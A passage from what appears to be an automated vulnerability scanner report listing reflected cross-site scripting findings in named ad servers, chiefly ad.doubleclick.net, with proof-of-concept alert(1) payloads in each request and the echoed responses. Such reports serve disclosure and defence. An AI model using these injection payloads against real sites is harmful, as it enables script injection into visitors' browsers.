3aae/7/7d/%2a/q%3B234150289%3B1-0%3B0%3B57930397%3B4307-300/250%3B39601762/39619549/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=7261e"-alert(1)-"ebc0bfc526fhttp://lp2.turbotax.com/ty10/oadisp/ph-1/control_gps_f?cid=bn_vc_f_anb_rncpaut_CRFfgg_ppk_300x250&priorityCode=4654700000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var
...[SNIP]...

1.34. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f824'-alert(1)-'78ddba2521c was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=67f824'-alert(1)-'78ddba2521c&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=67f824'-alert(1)-'78ddba2521c&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000\">
...[SNIP]...

1.35. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d629c"-alert(1)-"dabc82fe9a7 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6d629c"-alert(1)-"dabc82fe9a7&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6320

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:49:06 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/f%3B234150289%3B0-0%3B0%3B57930397%3B4307-300/250%3B39601731/39619518/11%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6d629c"-alert(1)-"dabc82fe9a7&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/scroll_f%3Fcid%3Dbn_vc_f_anb_rncpaut_ScrFr_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClickTa
...[SNIP]...

1.36. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [mid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4aaee'-alert(1)-'64021cf45b7 was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=5115034aaee'-alert(1)-'64021cf45b7&m=6&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:43:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6001

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:38:21 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
//ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/u%3B234150289%3B2-0%3B0%3B57930397%3B4307-300/250%3B39865159/39882946/3%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=5115034aaee'-alert(1)-'64021cf45b7&m=6&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/jnsfr%3Fcid%3Dbn_vc_f_anb_rncpaut_Frjns_ppk_300x250_%26priorityCode%3D4654700000\">
...[SNIP]...

1.37. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [mid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13a69"-alert(1)-"441cf269a49 was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=51150313a69"-alert(1)-"441cf269a49&m=6&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:43:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6320

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:49:06 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
/ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/f%3B234150289%3B0-0%3B0%3B57930397%3B4307-300/250%3B39601731/39619518/11%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=51150313a69"-alert(1)-"441cf269a49&m=6&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/scroll_f%3Fcid%3Dbn_vc_f_anb_rncpaut_ScrFr_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlCli
...[SNIP]...

1.38. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca60b"-alert(1)-"9ecef699118 was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627ca60b"-alert(1)-"9ecef699118&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627ca60b"-alert(1)-"9ecef699118&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var
...[SNIP]...

1.39. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dcb10'-alert(1)-'29a07cd16fe was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627dcb10'-alert(1)-'29a07cd16fe&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627dcb10'-alert(1)-'29a07cd16fe&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000\">
...[SNIP]...

1.40. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f21e"-alert(1)-"c1a80b55da6 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=2746144f21e"-alert(1)-"c1a80b55da6&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:43:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6001

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:38:21 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
cape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/u%3B234150289%3B2-0%3B0%3B57930397%3B4307-300/250%3B39865159/39882946/3%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=2746144f21e"-alert(1)-"c1a80b55da6&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/jnsfr%3Fcid%3Dbn_vc_f_anb_rncpaut_Frjns_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClic
...[SNIP]...

1.41. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92ab7'-alert(1)-'6d6e3b013b3 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=27461492ab7'-alert(1)-'6d6e3b013b3&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:43:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6341

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:42:54 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ref=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/q%3B234150289%3B1-0%3B0%3B57930397%3B4307-300/250%3B39601762/39619549/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=27461492ab7'-alert(1)-'6d6e3b013b3&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/control_gps_f%3Fcid%3Dbn_vc_f_anb_rncpaut_CRFfgg_ppk_300x250%26priorityCode%3D4654700000\">
...[SNIP]...

1.42. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [tp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3faad"-alert(1)-"dcba53557ab was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=83faad"-alert(1)-"dcba53557ab&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
lick%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=83faad"-alert(1)-"dcba53557ab&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "
...[SNIP]...

1.43. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [tp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22cba'-alert(1)-'0a0ea759385 was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=822cba'-alert(1)-'0a0ea759385&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6341

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:42:54 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
lick%3Bh%3Dv8/3aae/f/7d/%2a/q%3B234150289%3B1-0%3B0%3B57930397%3B4307-300/250%3B39601762/39619549/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=822cba'-alert(1)-'0a0ea759385&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/control_gps_f%3Fcid%3Dbn_vc_f_anb_rncpaut_CRFfgg_ppk_300x250%26priorityCode%3D4654700000\">
...[SNIP]...

1.44. http://ad.doubleclick.net/adj/uk.reuters/news/lifestyle/article [type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/uk.reuters/news/lifestyle/article

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9eaaa'%3balert(1)//62bc3773dd1 was submitted in the type parameter. This input was echoed as 9eaaa';alert(1)//62bc3773dd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/uk.reuters/news/lifestyle/article;type=9eaaa'%3balert(1)//62bc3773dd1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 278
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 01:35:57 GMT
Expires: Mon, 14 Feb 2011 01:35:57 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/a;44306;0-0;0;46373374;39648-768/768;0/0/0;;~okv=;type=9eaaa';alert(1)//62bc3773dd1;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

1.45. http://ad.doubleclick.net/adj/wpni.politics/inlinead [ad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wpni.politics/inlinead

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d2cc'-alert(1)-'80eb2a6b3f6 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/wpni.politics/inlinead;ad=5d2cc'-alert(1)-'80eb2a6b3f6 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 360
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 01:38:09 GMT
Expires: Mon, 14 Feb 2011 01:43:09 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/u;236054673;0-0;0;20580498;255-0/0;40598846/40616633/1;;~okv=;ad=5d2cc'-alert(1)-'80eb2a6b3f6;~aopt=2/0/a8/0;~sscs=%3fhttp://www.c-span.org/Series/Washington-Journal/">
...[SNIP]...

1.46. http://ad.media6degrees.com/adserv/cs [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.media6degrees.com
Path:   /adserv/cs

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdefb"-alert(1)-"6a122e04d38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

